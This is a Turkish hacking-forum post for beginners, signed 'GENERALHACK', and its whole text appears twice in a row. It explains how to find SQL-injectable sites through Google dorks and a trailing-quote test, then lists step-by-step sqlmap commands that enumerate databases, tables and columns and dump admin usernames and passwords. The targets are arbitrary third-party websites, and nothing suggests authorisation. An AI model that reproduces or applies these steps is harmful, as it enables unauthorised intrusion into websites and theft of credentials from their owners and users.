Merhabalar .. Şimdi Sizlere Yeni Başlayan Arkadaşlar İçin Yararlı Olacak Sql Açıklı Siteleri DARKMYSQL , SQLMAP , HVAJİ BUNLARLA NASIL Hack Yani Siteye Erişiriz ? Onu Anlatacagım ..
1- El (sql dork )Veya Program İle Açık Arama ; Safe 3 Programını Ögreirim foruma Yazın Anlatımı İle Çıkar ,
El ile : Arkadaşlar İlk Önce Bir Dork Bulunu Foruma Sql injection dork nasıl yapılır Diye Yazarak Ögrenebilirsiniz. Ardından Googleye O Dorkunuzu Yazın Sonu id=Sayı İle Biten . Siteleri Sonuna " ' " yani üstten tırnak ekleyip enterlerin
Örnek ; hedefsite.com/id=88' böyle yapıp enterleyin içinde sql geçen bir hata veirrse vardır açık yok yoktur başka deneyin
SQLMAP KULLANIMI
SQLMAP'I İNDİRELİM MASAÜSTÜNE ATALIM Klasorun adı "sqlmap" değilse yapın ardından cmd ' ye geçin ve sırayla şu kodları yazın
cd desktop (masaüstü)
cd sqlmap (sqlmap klasoru)
cd sqlmap.py (sqlmap klasoru içindeki sqlmap.py dosyası)
bu şekilde yapın enterleyin sırasıyla ama ilk cd desktop enter öyle devam edin ardından kod ekranı gelecek cmd deki gibi aynı
YAZILMASI GEREKEN DORK ..
sqlmap.py -u hedefsite.com vb. /id=hangi sayı ise --dbs bunu böyle yapın enterleyin Karşınıza Y/n Gelirse y büyük ise y n büyük ise n yi Seçin
Ardından Sizlere Databaseleri Verir.
informasıon_cheama şeklinde olan datayı almayın her sitede vardır digerlerini alın
örnek : Databeseler: informasıon cheama , 1 Alt alta gelir .
yazılacak kod: sqlmap.py -u hedefsite.com vb. / id= hangi sayı ise -D (seçtiginiz database) 1 --tables
böyle yazın enterleyin devam edin 1 data sının içindeki tablonları size verecektir o tablonların içinden istediginiz bir tabloyu seçin admin pass ıd bulmak için genelde tablolar : user,pass,admin vb. vb.
seçtikten sonra yazılacak dork : sqlmap.py -u hedefsite.com vb. / id= hangi sayı ise -D 1 -T seçilen tables --columns
yani ne dedik ? seçilen tablondaki colonları bize ver dedik.
sonra o colonlardakide istediginizi seçin ve bu kodu yazın :
sqlmap.py -u hedefsite.com vb. / id= hangi sayı ise -D 1 -T seçilen tables -C seçilen colon --dump
evet bunu yazınca eger dogru yerde iseniz admin ıd pass orada ise onları verir eger orada deyil ise başka tables , başka columns , 1 den fazla informasıon chema hariç 1 den fazla varsa database onları deneyin mesala 1 ' i denedik 2 varsa onu deneyin .
DİPNOT : ARKADAŞLAR BAKTINIZ YOK BAŞKA SİTELER BULUN DARKMYSQL BİRAZ KARIŞIK ANLATMAK İSTEMEDİM HVAJİ İSE BENCE GEREKSİZ HER SİTEYE GİRMEZ KAPSAMLI ARAMA YAPMIYOR AMA SQLMAP EN İYİSİ OLDUGU İÇİN ONU ANLATTIM DİLERSENİZ FORUMDA VARDIR HVAJİ ANLATIM ORADA BAKIN AMA DEDİGİM GİBİ BENDE DARKMYSQL VE SQLMAP EN İYİSİ Acunetix Anlatmadıgım için onu en iyisi arasına katmıyorum suanlık
SORULARINIZ VARSA SORMAKTAN ASLA ÇEKİNMEYİN !
İYİ GÜNLER
-SEO
-GENERALHACK !
1- El (sql dork )Veya Program İle Açık Arama ; Safe 3 Programını Ögreirim foruma Yazın Anlatımı İle Çıkar ,
El ile : Arkadaşlar İlk Önce Bir Dork Bulunu Foruma Sql injection dork nasıl yapılır Diye Yazarak Ögrenebilirsiniz. Ardından Googleye O Dorkunuzu Yazın Sonu id=Sayı İle Biten . Siteleri Sonuna " ' " yani üstten tırnak ekleyip enterlerin
Örnek ; hedefsite.com/id=88' böyle yapıp enterleyin içinde sql geçen bir hata veirrse vardır açık yok yoktur başka deneyin
SQLMAP KULLANIMI
SQLMAP'I İNDİRELİM MASAÜSTÜNE ATALIM Klasorun adı "sqlmap" değilse yapın ardından cmd ' ye geçin ve sırayla şu kodları yazın
cd desktop (masaüstü)
cd sqlmap (sqlmap klasoru)
cd sqlmap.py (sqlmap klasoru içindeki sqlmap.py dosyası)
bu şekilde yapın enterleyin sırasıyla ama ilk cd desktop enter öyle devam edin ardından kod ekranı gelecek cmd deki gibi aynı
YAZILMASI GEREKEN DORK ..
sqlmap.py -u hedefsite.com vb. /id=hangi sayı ise --dbs bunu böyle yapın enterleyin Karşınıza Y/n Gelirse y büyük ise y n büyük ise n yi Seçin
Ardından Sizlere Databaseleri Verir.
informasıon_cheama şeklinde olan datayı almayın her sitede vardır digerlerini alın
örnek : Databeseler: informasıon cheama , 1 Alt alta gelir .
yazılacak kod: sqlmap.py -u hedefsite.com vb. / id= hangi sayı ise -D (seçtiginiz database) 1 --tables
böyle yazın enterleyin devam edin 1 data sının içindeki tablonları size verecektir o tablonların içinden istediginiz bir tabloyu seçin admin pass ıd bulmak için genelde tablolar : user,pass,admin vb. vb.
seçtikten sonra yazılacak dork : sqlmap.py -u hedefsite.com vb. / id= hangi sayı ise -D 1 -T seçilen tables --columns
yani ne dedik ? seçilen tablondaki colonları bize ver dedik.
sonra o colonlardakide istediginizi seçin ve bu kodu yazın :
sqlmap.py -u hedefsite.com vb. / id= hangi sayı ise -D 1 -T seçilen tables -C seçilen colon --dump
evet bunu yazınca eger dogru yerde iseniz admin ıd pass orada ise onları verir eger orada deyil ise başka tables , başka columns , 1 den fazla informasıon chema hariç 1 den fazla varsa database onları deneyin mesala 1 ' i denedik 2 varsa onu deneyin .
DİPNOT : ARKADAŞLAR BAKTINIZ YOK BAŞKA SİTELER BULUN DARKMYSQL BİRAZ KARIŞIK ANLATMAK İSTEMEDİM HVAJİ İSE BENCE GEREKSİZ HER SİTEYE GİRMEZ KAPSAMLI ARAMA YAPMIYOR AMA SQLMAP EN İYİSİ OLDUGU İÇİN ONU ANLATTIM DİLERSENİZ FORUMDA VARDIR HVAJİ ANLATIM ORADA BAKIN AMA DEDİGİM GİBİ BENDE DARKMYSQL VE SQLMAP EN İYİSİ Acunetix Anlatmadıgım için onu en iyisi arasına katmıyorum suanlık
SORULARINIZ VARSA SORMAKTAN ASLA ÇEKİNMEYİN !
İYİ GÜNLER
-SEO
-GENERALHACK !